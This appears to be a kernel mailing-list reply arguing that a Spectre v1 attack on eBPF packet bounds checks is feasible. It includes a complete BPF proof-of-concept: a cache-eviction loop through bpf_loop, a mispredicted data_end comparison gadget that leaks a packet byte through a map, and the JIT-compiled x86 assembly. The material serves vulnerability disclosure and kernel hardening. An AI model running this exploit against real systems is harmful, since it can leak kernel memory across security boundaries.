On Thu, 14 Sep 2023 12:47:16 -0700, Alexei Starovoitov wrote:
You mean since skb_shared_info is placed after skb->end and in zero copy case destructor_arg may be initialized with the same kernel pointer for multiple skb-s ? The attacker cannot construct the address from data_end. The verifier explicitly prohibits any ALU with PTR_TO_PACKET_END. But the attacker can do skb->data + X. The idea is that they can train the branch to mispredict with a large packet and then send a small one so that shared_info after skb->end has the same uarg pointer in all packets? So every skb->data+X is a different location, but all of them point to data that has uarg==destructor_arg ?
That would be feasible in theory, but in order to speculate the loads the branch mispredict has to be reliable. The spec v1 attack requires one of two loads feeding into compare operation has to be slow. In this case both data and data_end loads are going to be fast. The attacker cannot evict skb->data or skb->data_end from cache.
It is true that this is not easily possible using the method most exploits use, at least to my knowledge (i.e., accessing the same address from another core). However, it is still possible to evict the cacheline with skb->data/data_end from the cache in between the loads by iterating over a large map using bpf_loop(). Then the load of skb->data_end would be slow while skb->data is readily available in a callee-saved register.
For a CPU with 64KiB of per-core L1 cache all 64-byte cachelines can be evicted by iterating over a 64KiB array using 64-byte increments, that's only 1k iterations. Meanwhile, skb->data can be safe in r15 as this is not used by bpf_loop() and bpf_map_lookup_elem(). Even evicting the L2 cache might be possible as bpf_loop() currently has a iteration limit of 8 million. To extend that, userspace could work on evicting the L3 cache from other cores and make the speculation window even larger. This would of course slow the whole reading process down, but in return you can also leak more data by indexing into the leak-array using a full byte.
For reference, here's the full program and assembly it is jited to:
static long callback_fn(__u32 index, void *ctx) { __u32 key = index * 8; __u64 *value = bpf_map_lookup_elem(&evictmap, &key); if (value) { *value = 2 * *value; return 0; } return 1; }
SEC("tcx/ingress") __naked void pkt_ptr(void) { // +76: data // +80: data_end asm volatile (" \ r6 = 0; \ r7 = r1; \ prepare_data_%=: \ r8 = *(u32 *)(r1 + 76); \ r9 = r8; \ r9 += 34; \ evict_loop_%=: \ w1 = 1024; \ r2 = %[callback_fn] ll; \ r3 = 0; \ *(u64 *)(r10 - 8) = r3; \ r3 = r10; \ r3 += -8; \ r4 = 0; \ call %[bpf_loop]; \ gadget_%=: \ r2 = *(u32 *)(r7 + 80); \ if r2 <= r9 goto exit_%=; \ r5 = *(u8 *)(r7 + 14); \ *(u64*)(r10 - 8) = r5; \ r2 = r10; \ r2 += -8; \ r1 = %[leakmap] ll; \ call %[bpf_map_lookup_elem]; \ if r0 == 0 goto exit_%=; \ r6 = *(u64 *)(r0 + 0); \ exit_%=: r0 = r6; \ exit; \ " : : __imm_addr(leakmap), __imm_addr(callback_fn), __imm(bpf_loop), __imm(bpf_map_lookup_elem) : __clobber_all); }
bpf_prog_64fe264baec539aa_pkt_ptr: ; asm volatile (" \ 0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64 13: sub $0x20,%rsp 1a: push %rbx 1b: push %r13 1d: push %r14 1f: push %r15 21: xor %ebx,%ebx 23: mov %rdi,%r13 26: mov 0xc8(%rdi),%r14 2d: mov %r14,%r15 30: add $0x22,%r15 // data prepared 34: mov $0x2000,%edi 39: movabs $0xffffffffc01d09b0,%rsi 43: xor %edx,%edx 45: mov %rdx,-0x8(%rbp) 49: lfence 4c: mov %rbp,%rdx 4f: add $0xfffffffffffffff8,%rdx 53: xor %ecx,%ecx 55: cmp $0x800000,%rdi 5c: jbe 0x0000000000000065 5e: mov $0xfffffff9,%eax 63: jmp 0x00000000000000a2 65: mov %rbx,-0x20(%rbp) 69: mov %r13,-0x18(%rbp) 6d: mov %r14,-0x10(%rbp) 71: mov %rdi,%rbx 74: xor %r13d,%r13d 77: mov %rdx,%r14 7a: cmp %rbx,%r13 7d: jae 0x0000000000000093 7f: mov %r13,%rdi 82: mov %r14,%rsi 85: callq 0x0000000000000148 8a: add $0x1,%r13 8e: test %rax,%rax 91: je 0x000000000000007a 93: mov %r13,%rax 96: mov -0x20(%rbp),%rbx 9a: mov -0x18(%rbp),%r13 9e: mov -0x10(%rbp),%r14 a2: mov 0x50(%r13),%rsi // load data_end a6: cmp %r15,%rsi // use of data_end and data a9: jbe 0x00000000000000f7 // to mispredict ab: movzwq 0x7c(%r13),%r8 // use of data b0: shr $0x10,%r8d b4: and $0xff,%r8d bb: mov %r8,-0x8(%rbp) bf: mov %rbp,%rsi c2: add $0xfffffffffffffff8,%rsi c6: movabs $0xffffb85680acd000,%rdi d0: add $0x210,%rdi d7: mov 0x0(%rsi),%eax da: cmp $0x20000,%rax e1: jae 0x00000000000000ec e3: shl $0x3,%rax e7: add %rdi,%rax ea: jmp 0x00000000000000ee ec: xor %eax,%eax ee: test %rax,%rax f1: je 0x00000000000000f7 f3: mov 0x0(%rax),%rbx f7: mov %rbx,%rax fa: pop %r15 fc: pop %r14 fe: pop %r13 100: pop %rbx 101: leaveq 102: retq
long callback_fn(__u32 index, void * ctx): bpf_prog_8e1ec5bf965fdd4a_callback_fn: ; __u32 key = index * 8; 0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64 13: sub $0x8,%rsp 1a: shl $0x3,%edi ; __u32 key = index * 8; 1d: mov %edi,-0x4(%rbp) 20: lfence 23: mov %rbp,%rsi ; 26: add $0xfffffffffffffffc,%rsi ; __u64 *value = bpf_map_lookup_elem(&evictmap, &key); 2a: movabs $0xffffb85680a01000,%rdi 34: add $0x210,%rdi 3b: mov 0x0(%rsi),%eax 3e: cmp $0x1000,%rax 45: jae 0x0000000000000050 47: shl $0x3,%rax 4b: add %rdi,%rax 4e: jmp 0x0000000000000052 50: xor %eax,%eax 52: mov $0x1,%edi ; if (value) { 57: test %rax,%rax 5a: je 0x0000000000000069 ; *value = 2 * *value; 5c: mov 0x0(%rax),%rdi ; *value = 2 * *value; 60: shl %rdi ; *value = 2 * *value; 63: mov %rdi,0x0(%rax) 67: xor %edi,%edi ; } 69: mov %rdi,%rax 6c: leaveq 6d: retq
Remember that we rearranged 'max_entries' field in struct bpf_map specifically to be in the different cache line vs fields controlled by user space. It was the necessary part of spec v1 attack.